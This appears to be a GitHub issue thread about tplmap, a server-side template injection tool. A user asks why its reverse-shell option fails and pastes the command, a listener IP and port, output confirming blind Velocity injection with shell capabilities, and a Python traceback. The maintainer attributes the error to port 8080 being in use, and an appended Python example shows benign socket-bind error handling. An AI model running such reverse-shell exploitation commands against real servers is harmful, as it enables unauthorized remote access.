epinna / tplmap

Server-Side Template Injection and Code Injection Detection and Exploitation Tool
GNU General Public License v3.0

correct use of reverse shell #17

Closed lacroutelacroute closed 7 years ago

lacroutelacroute commented 7 years ago

How do I use reverse-shell correctly?

my error is:

sudo python ./tplmap.py -u '' -e velocity --level=5 --reverse-shell 82.246.225.33 8080
[+] Tplmap 0.3
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'tag' is injectable
[+] Velocity plugin is testing rendering with tag '#set($c=)\n${c}\n'
[+] Velocity plugin is testing ) code context escape with 91 variations
[+] Velocity plugin is testing #end#if(1==1) code context escape with 91 variations
[+] Velocity plugin is testing blind injection
[+] Velocity plugin is testing ) code context escape with 91 variations
[+] Velocity plugin has confirmed blind injection
[+] Tplmap identified the following injection point:

  GET parameter: tag
  Engine: Velocity
  Injection: a})*
  Context: code
  OS: undetected
  Technique: blind
  Capabilities:

   Shell command execution: yes (blind)
   Bind and reverse shell: yes
   File write: yes (blind)
   File read: no
   Code evaluation: no

[!][tplmap] Exiting: global name 'messages' is not defined
Traceback (most recent call last):
  File "./tplmap.py", line 26, in <module>
    main()
  File "./tplmap.py", line 19, in main
    checks.check_template_injection(Channel(args))
  File "/opt/tplmap/tplmap/core/checks.py", line 299, in check_template_injection
    tcpserver = TcpServer(int(port), timeout)
  File "/opt/tplmap/tplmap/core/tcpserver.py", line 18, in __init__
    self.connect_socket()
  File "/opt/tplmap/tplmap/core/tcpserver.py", line 41, in connect_socket
    log.error(messages.module_backdoor_reversetcp.error_binding_socket_s % str(e))
NameError: global name 'messages' is not defined

I do not understand; there are very few docs online.

epinna commented 7 years ago

I fixed the bug, but you should still see the following error message:

[-][tcpserver] Port bind on IP:8080 has failed: [Errno 48] Address already in use

Because 8080 is already used. Close any netcat or service listening on that port and re-launch the command.
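
The failure discussed in this thread, as an added example that is not tplmap's own code: the traceback shows the bind error being masked because the error-handling path itself raised a NameError. The sketch below binds a listener and reports "address already in use" using only names the module imports; the function name `bind_listener` and the message wording are assumptions made for illustration.

```python
import errno
import socket


def bind_listener(port, host="127.0.0.1"):
    """Try to bind a TCP listener on host:port.

    Returns (sock, message). sock is None when the bind fails, and the
    message carries the real cause instead of a secondary exception.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind((host, port))
        sock.listen(1)
    except OSError as e:
        sock.close()
        # The errno number differs per OS (48 on macOS, 98 on Linux),
        # so compare against the symbolic constant, not a literal.
        if e.errno == errno.EADDRINUSE:
            reason = "address already in use"
        elif e.errno == errno.EACCES:
            reason = "permission denied (ports below 1024 need privileges)"
        else:
            reason = str(e)
        return None, "Port bind on %s:%d has failed: %s" % (host, port, reason)
    bound_port = sock.getsockname()[1]
    return sock, "Listening on %s:%d" % (host, bound_port)


def demo():
    """Constructed scenario: occupy a port, then try to bind it again."""
    first, msg1 = bind_listener(0)        # port 0: the OS picks a free port
    port = first.getsockname()[1]
    second, msg2 = bind_listener(port)    # same port while first is listening
    first.close()
    return msg1, msg2, second


if __name__ == "__main__":
    for line in demo()[:2]:
        print(line)
```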